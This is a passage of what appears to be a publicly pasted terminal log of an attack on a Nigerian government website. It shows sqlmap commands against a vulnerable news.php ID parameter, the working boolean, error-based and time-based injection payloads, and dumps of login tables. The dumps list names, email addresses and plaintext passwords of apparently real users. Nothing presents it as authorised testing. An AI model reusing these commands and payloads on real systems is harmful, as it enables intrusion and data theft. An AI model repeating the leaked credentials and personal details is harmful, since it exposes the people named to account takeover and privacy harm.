  1344. | CHAOS RECONS | 0xa6ba18356a193f2e | ojo | gga.sb52@gmail.com | 2 |
  1345. | Emmanuel Joseph | \\0621\\0621\\0649\\0621\\0621 | ejoseph | e_josseph@yahoo.com | 3 |
  1346. | henry rowlands | 0xf1cb26aef1432520 | hrowlands | hrowlands@sec.gov.ng | 4 |
  1347. | ope | emrebaba | opeyemi | ope@ope.com | 5 |
  1348. | alfred ako | emrebaba | alfred | alf@afafag.com | 6 |
  1349. | clement | \\0621\\0621\\0649\\0621\\0621 | clement | clementyari@yahoo.com | 7 |
  1350. | peteronwualu | \\0621\\0621\\0649\\0621\\0621 | peteronwualu | ponwualu@yahoo.com | 8 |
  1351. | Uchenna | 0x108ad2e98fa5335d | nbrriadmin | akabsuc@gmail.com | 9 |
  1352. | Admin | \\0621\\0621\\0649\\0621\\0621 | nbrrilog | webprince64@yahoo.com | 10 |
  1353. | 111111 | \\0621\\0621\\0649\\0621\\0621 | dayoxx | webprince644@gmail.com | 11 |
  1354. | Administrator | \\0621\\0621\\0649\\0621\\0621 | adminnbrri | webprince64@gmail.com | 20 |
  1355. | ElSurveillance | \\0621\\0621\\0649\\0621\\0621 | ElsHacker | ElSurveillance@twitter.com | 21 |
  1356. | madleets | \\0621\\0621\\0649\\0621\\0621 | madleets | abd@adddbd.com | 22 |
  1357. | sniper-ly | 12345@ | sniper-ly | abseeimoostfaa@gmail.com | 23 |
  1358. | pacman | dandikler | ezekiel | pac@anonymous.com | 24 |
  1359. | NigerianGamer27 | Nigeria | NigerianFart | xandercapece@yahoo.com | 25 |
  1360. | abood2011 | Aa0558802997 | abood2011 | aboofdgs58@gmail.com | 26 |
  1361. | Admin | Ahmed11 | adnbrri | webprince64@gmail.com | 27 |
  1362. +-----------------+--------------------------------+--------------+----------------------------+----+
  1363.  
  1364. [08:34:36] [INFO] table 'nbrrigov_123.login' dumped to CSV file '/root/.sqlmap/output/www.nbrri.gov.ng/dump/nbrrigov_123/login.csv'
  1365. [08:34:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  1366. root@BitCoin:/home/helmi# 0xa6ba18356a193f2eadnbrriadnbrriAhmed11NigerianFartNig0649\\0621\\0621hrowlands0xf1cb26aef1432520s
  1367. 0xa6ba18356a193f2eadnbrriadnbrriAhmed11NigerianFartNigeriaNigerianFartNigeriaabo26aef1432520s: command not found
  1368. root@BitCoin:/home/helmi# sqlmap -u http://www.nbrri.gov.ng/sites/news.php?ID=57 -D nbrrigov_123 -T userlogin -C Username,Password --dump
  1369. _
  1370. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  1371. |_ -| . | | | .'| . |
  1372. |___|_ |_|_|_|_|__,| _|
  1373. |_| |_| http://sqlmap.org
  1374.  
  1375. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1376.  
  1377. [*] starting at 08:45:57
  1378.  
  1379. [08:45:58] [INFO] resuming back-end DBMS 'mysql'
  1380. [08:45:58] [INFO] testing connection to the target URL
  1381. [08:46:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
  1382. sqlmap resumed the following injection point(s) from stored session:
  1383. ---
  1384. Parameter: ID (GET)
  1385. Type: boolean-based blind
  1386. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  1387. Payload: ID=57 RLIKE (SELECT (CASE WHEN (3840=3840) THEN 57 ELSE 0x28 END))
  1388.  
  1389. Type: error-based
  1390. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  1391. Payload: ID=57 AND EXTRACTVALUE(1351,CONCAT(0x5c,0x71717a7171,(SELECT (ELT(1351=1351,1))),0x7178627071))
  1392.  
  1393. Type: AND/OR time-based blind
  1394. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1395. Payload: ID=57 AND (SELECT * FROM (SELECT(SLEEP(5)))gPUK)
  1396. ---
  1397. [08:46:01] [INFO] the back-end DBMS is MySQL
  1398. web application technology: PHP 5.6.31, Apache 2.4.27
  1399. back-end DBMS: MySQL 5.1
  1400. [08:46:01] [INFO] fetching entries of column(s) 'Password, Username' for table 'userlogin' in database 'nbrrigov_123'
  1401. [08:46:01] [INFO] the SQL query used returns 2 entries
  1402. [08:46:01] [INFO] retrieved: xdayox
  1403. [08:46:01] [INFO] retrieved: dayo
  1404. [08:46:02] [INFO] retrieved: zuwvmuc3
  1405. [08:46:02] [INFO] retrieved: admin_nsiwc
  1406. [08:46:02] [INFO] analyzing table dump for possible password hashes
  1407. Database: nbrrigov_123
  1408. Table: userlogin
  1409. [2 entries]
  1410. +-------------+----------+
  1411. | Username | Password |
  1412. +-------------+----------+
  1413. | dayo | xdayox |
  1414. | admin_nsiwc | zuwvmuc3 |
  1415. +-------------+----------+
  1416.  
  1417. [08:46:02] [INFO] table 'nbrrigov_123.userlogin' dumped to CSV file '/root/.sqlmap/output/www.nbrri.gov.ng/dump/nbrrigov_123/userlogin.csv'
  1418. [08:46:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  1419. root@BitCoin:/home/helmi# sqlmap -u http://www.nbrri.gov.ng/sites/news.php?ID=57 -D nbrrigov_123 -T login_copy -C email,ID,name,password,username --dump
  1420. _
  1421. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  1422. |_ -| . | | | .'| . |
  1423. |___|_ |_|_|_|_|__,| _|
  1424. |_| |_| http://sqlmap.org
  1425.  
  1426. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1427.  
  1428. [*] starting at 08:47:54
  1429.  
  1430. [08:47:54] [INFO] resuming back-end DBMS 'mysql'
  1431. [08:47:54] [INFO] testing connection to the target URL
  1432. [08:47:56] [INFO] heuristics detected web page charset 'ISO-8859-2'
  1433. sqlmap resumed the following injection point(s) from stored session:
  1434. ---
  1435. Parameter: ID (GET)
  1436. Type: boolean-based blind
  1437. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  1438. Payload: ID=57 RLIKE (SELECT (CASE WHEN (3840=3840) THEN 57 ELSE 0x28 END))
  1439.  
  1440. Type: error-based
  1441. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  1442. Payload: ID=57 AND EXTRACTVALUE(1351,CONCAT(0x5c,0x71717a7171,(SELECT (ELT(1351=1351,1))),0x7178627071))
  1443.  
  1444. Type: AND/OR time-based blind
  1445. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1446. Payload: ID=57 AND (SELECT * FROM (SELECT(SLEEP(5)))gPUK)
  1447. ---
  1448. [08:47:56] [INFO] the back-end DBMS is MySQL
  1449. web application technology: PHP 5.6.31, Apache 2.4.27
  1450. back-end DBMS: MySQL 5.1
  1451. [08:47:56] [INFO] fetching entries of column(s) 'ID, email, name, password, username' for table 'login_copy' in database 'nbrrigov_123'
  1452. [08:47:56] [INFO] the SQL query used returns 9 entries
  1453. [08:47:56] [INFO] retrieved: 1
  1454. [08:47:57] [INFO] retrieved: webprince64@yahoo.com
  1455. [08:47:57] [INFO] retrieved: Adex
  1456. [08:47:57] [INFO] retrieved: ahmed1
  1457. [08:47:58] [INFO] retrieved: dayo
  1458. [08:47:58] [INFO] retrieved: 2
  1459. [08:47:58] [INFO] retrieved: ojo@nsiwc.gov.ng
  1460. [08:47:59] [INFO] retrieved: ojo
  1461. [08:47:59] [INFO] retrieved: dayo
  1462. [08:47:59] [INFO] retrieved: ojo
  1463. [08:47:59] [INFO] retrieved: 3
  1464. [08:48:00] [INFO] retrieved: e_josseph@yahoo.com
  1465. [08:48:00] [INFO] retrieved: Emmanuel Joseph
  1466. [08:48:00] [INFO] retrieved: password
  1467. [08:48:00] [INFO] retrieved: ejoseph
  1468. [08:48:01] [INFO] retrieved: 4
  1469. [08:48:01] [INFO] retrieved: hrowlands@sec.gov.ng
  1470. [08:48:01] [INFO] retrieved: henry rowlands
  1471. [08:48:02] [INFO] retrieved: password
  1472. [08:48:02] [INFO] retrieved: hrowlands
  1473. [08:48:02] [INFO] retrieved: 5
  1474. [08:48:02] [INFO] retrieved: ope@ope.com
  1475. [08:48:03] [INFO] retrieved: ope
  1476. [08:48:03] [INFO] retrieved: opey
  1477. [08:48:03] [INFO] retrieved: opeyemi
  1478. [08:48:04] [INFO] retrieved: 6
  1479. [08:48:04] [INFO] retrieved: alf@afafag.com
  1480. [08:48:04] [INFO] retrieved: alfred ako
  1481. [08:48:04] [INFO] retrieved: alfred
  1482. [08:48:05] [INFO] retrieved: alfred
  1483. [08:48:05] [INFO] retrieved: 7
  1484. [08:48:05] [INFO] retrieved: clementyari@yahoo.com
  1485. [08:48:06] [INFO] retrieved: clement
  1486. [08:48:06] [INFO] retrieved: abuja123
  1487. [08:48:06] [INFO] retrieved: clement
  1488. [08:48:07] [INFO] retrieved: 8
  1489. [08:48:07] [INFO] retrieved: ponwualu@yahoo.com
  1490. [08:48:07] [INFO] retrieved: peteronwualu
  1491. [08:48:07] [INFO] retrieved: peteronwualu.net
  1492. [08:48:08] [INFO] retrieved: peteronwualu
  1493. [08:48:08] [INFO] retrieved: 9
  1494. [08:48:08] [INFO] retrieved: akabsuc@gmail.com
  1495. [08:48:09] [INFO] retrieved: Uchenna
  1496. [08:48:09] [INFO] retrieved: jabi232#
  1497. [08:48:09] [INFO] retrieved: nbrriadmin
  1498. [08:48:09] [INFO] analyzing table dump for possible password hashes
  1499. Database: nbrrigov_123
  1500. Table: login_copy
  1501. [9 entries]
  1502. +-----------------------+----+-----------------+------------------+--------------+
  1503. | email | ID | name | password | username |
  1504. +-----------------------+----+-----------------+------------------+--------------+
  1505. | webprince64@yahoo.com | 1 | Adex | ahmed1 | dayo |
  1506. | ojo@nsiwc.gov.ng | 2 | ojo | dayo | ojo |
  1507. | e_josseph@yahoo.com | 3 | Emmanuel Joseph | password | ejoseph |
  1508. | hrowlands@sec.gov.ng | 4 | henry rowlands | password | hrowlands |
  1509. | ope@ope.com | 5 | ope | opey | opeyemi |
  1510. | alf@afafag.com | 6 | alfred ako | alfred | alfred |
  1511. | clementyari@yahoo.com | 7 | clement | abuja123 | clement |
  1512. | ponwualu@yahoo.com | 8 | peteronwualu | peteronwualu.net | peteronwualu |
  1513. | akabsuc@gmail.com | 9 | Uchenna | jabi232# | nbrriadmin |
  1514. +-----------------------+----+-----------------+------------------+--------------+
  1515.  
  1516. [08:48:09] [INFO] table 'nbrrigov_123.login_copy' dumped to CSV file '/root/.sqlmap/output/www.nbrri.gov.ng/dump/nbrrigov_123/login_copy.csv'
  1517. [08:48:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  1518. root@BitCoin:/home/helmi#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement